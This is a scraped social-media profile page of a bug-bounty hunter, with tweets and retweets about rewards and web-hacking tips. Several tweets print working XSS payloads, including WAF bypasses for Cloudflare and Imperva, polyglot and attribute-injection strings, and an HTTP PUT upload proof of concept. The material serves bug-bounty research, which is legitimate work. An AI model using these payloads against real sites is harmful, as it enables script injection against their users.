Amitlt2 Profile Banner
Amit Kumar🇮🇳 Profile
Amit Kumar🇮🇳

@Amitlt2

Followers
438
Following
828
Media
20
Statuses
307

Microsoft Q1 Top Researcher 2022 & Secured 100+ Applications | Web, API and Android Pentester | Security Analyst | Philophobia Guy |

Kolkata, India
Joined July 2020
Don't wanna be here? Send us removal request.
@Amitlt2
Amit Kumar🇮🇳
1 month
RT @nav1n0x: Simple LFI using my path traversal script on GitHub. Used @0xAsm0d3us’s ParamSpider to gather URLs, filtered for relevant para….
0
47
0
@Amitlt2
Amit Kumar🇮🇳
2 months
RT @GodfatherOrwa: Shame on @Hacker0x01.Please like and retweet .Previously, this platform demonstrated racial discrimination when it block….
0
156
0
@Amitlt2
Amit Kumar🇮🇳
4 months
Just received swag from @Sony via @Hacker0x01 for a valid vulnerability report! Another step forward in my #BugBounty journey. Stay consistent, stay curious!.#InfoSec #BugBountyHunter #CyberSecurity #HackerOne #ResponsibleDisclosure #EthicalHacking #RedTeam #AppSec #BugBountyWin
Tweet media one
2
2
30
@Amitlt2
Amit Kumar🇮🇳
4 months
Proud to be recognized by NASA for my security research contributions! It's an honor to help safeguard critical systems and support the mission of space exploration. Grateful for this acknowledgment! 🚀🔒 #NASA #CyberSecurity #BugBounty #Bugcrowd #EthicalHacking
Tweet media one
3
1
38
@Amitlt2
Amit Kumar🇮🇳
6 months
RT @0x0SojalSec: Bypass Cloudflare WAF (DOM-based XSS) ♻️. Payload:.'-alert?.(1)-' . writeup: #infosec #cybersec #….
0
56
0
@Amitlt2
Amit Kumar🇮🇳
7 months
RT @NahamSec: Final giveaway of the year🎁: .4️⃣Hand-On Web Exploitation (Course Only .3️⃣Shodan Codes.2️⃣Caido lic….
0
666
0
@Amitlt2
Amit Kumar🇮🇳
7 months
RT @hunter0x7: Update no 7: Reported 50 submissions (total). 1. XSS Bypass: <form><math><mtext></form><form><mglyph><style></math><img sr….
0
4
0
@Amitlt2
Amit Kumar🇮🇳
8 months
RT @Jhaddix: 🛑 GIVEAWAY ALERT 🛑. Today is DAY TWO of FIVE DAYS of @arcanuminfosec and friends Black Friday and Cyber Monday giveaways!. To….
0
526
0
@Amitlt2
Amit Kumar🇮🇳
8 months
RT @ProjectSEKAIctf: 🎁 End of Year Giveaway 🎁 . Hack The Box 6-month VIP+ x1.- Follow, Like, and Retweet to join!.- Winner will be picked r….
0
597
0
@Amitlt2
Amit Kumar🇮🇳
8 months
RT @NahamSec: 🎯 Black Friday Special+ Giveaway: . Get the full course for just $29 (reg. $119) at with code 'FRIDAY2024'! .
0
269
0
@Amitlt2
Amit Kumar🇮🇳
9 months
This payload uses layered encoding, tag closure tricks, and event triggers to evade filters and execute JavaScript across multiple contexts. #CyberSecurity #InfoSec #EthicalHacking #BugBounty #CyberThreats #Vulnerability #Malware #ZeroDay #bugbountytips #bugbountytip.
0
0
0
@Amitlt2
Amit Kumar🇮🇳
9 months
🚨 Ultimate #XSS Payload for Every Scenario! 🚨.JavaScript://%250A/*?'/*\'/*"/*\"/*`/*\`/*%26apos;)/* <!--</Title/</Style/</Script/</textArea/</iFrame> \74k<K/contentEditable/autoFocus/OnFocus= /*${/*/;{/**/(import(/https:\\)}//\76-->. By @RodoAssis.
1
1
3
@Amitlt2
Amit Kumar🇮🇳
9 months
🔍✨ Revealing sensitive data leaks with .json!. Pro tip: Adding a .json extension to your request might uncover hidden secret like accessing a secret token!. #bugbounty #bugbountytips #cybersecurity #hackerone #vulnerability #Hackers #web #protip #infosecurity
Tweet media one
0
2
10
@Amitlt2
Amit Kumar🇮🇳
9 months
Here is the workflow:. This payload injects an onmouseover event in the HTML, triggering alert(document.domain) when a user hovers over the element. Simple but powerful for finding open XSS vectors!.
0
1
4
@Amitlt2
Amit Kumar🇮🇳
9 months
Again, I scored $500 for another XSS vulnerability! 💰 . This time, I used the payload:- . %22%20onmouseover=alert(document.domain)%20x=%22. #bugbounty #infosec #XSS #bugbountytip #bugbountytips #Dhanteras #pentesting #webhacking #hackerone #bugcrowd
Tweet media one
9
10
160
@Amitlt2
Amit Kumar🇮🇳
9 months
RT @0x0SojalSec: A solid XSS payload that bypasses Imperva WAF ⚙️. <a/href="j%0A%0Davascript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][….
0
19
0
@Amitlt2
Amit Kumar🇮🇳
9 months
(1/3). 📢 Remember, an open PUT method can expose your server to unauthorized file uploads. Verify your configurations and secure it now!.
0
0
1
@Amitlt2
Amit Kumar🇮🇳
9 months
(1/2). PUT /testing-put.txt HTTP/1.1.Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4).Content-Length: 11.Content-Type: text/plain. POC+BY+AMIT.
1
0
0
@Amitlt2
Amit Kumar🇮🇳
9 months
🚨 Security Alert: PUT method is enabled! 🚨. 💰 Just grabbed $350 on @Bugcrowd ! 🐛✨. Hunting for bugs pays off! On to the next vulnerability! #BugBounty #CyberSecurity #Bugcrowd #HackThePlanet #Bugbountytip #bugbountytips . (1/1)
Tweet media one
8
9
133
@Amitlt2
Amit Kumar🇮🇳
9 months
🚨 Reflected XSS Alert! 🚨 Discovered a filter bypass using CSS & JavaScript tags to trigger an alert on document.domain! Payload breakdown:. --%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert(document.domain)%3C/scRipt%3E. #bugbountytips #bugbountytip #InfoSec #XSS
Tweet media one
7
25
201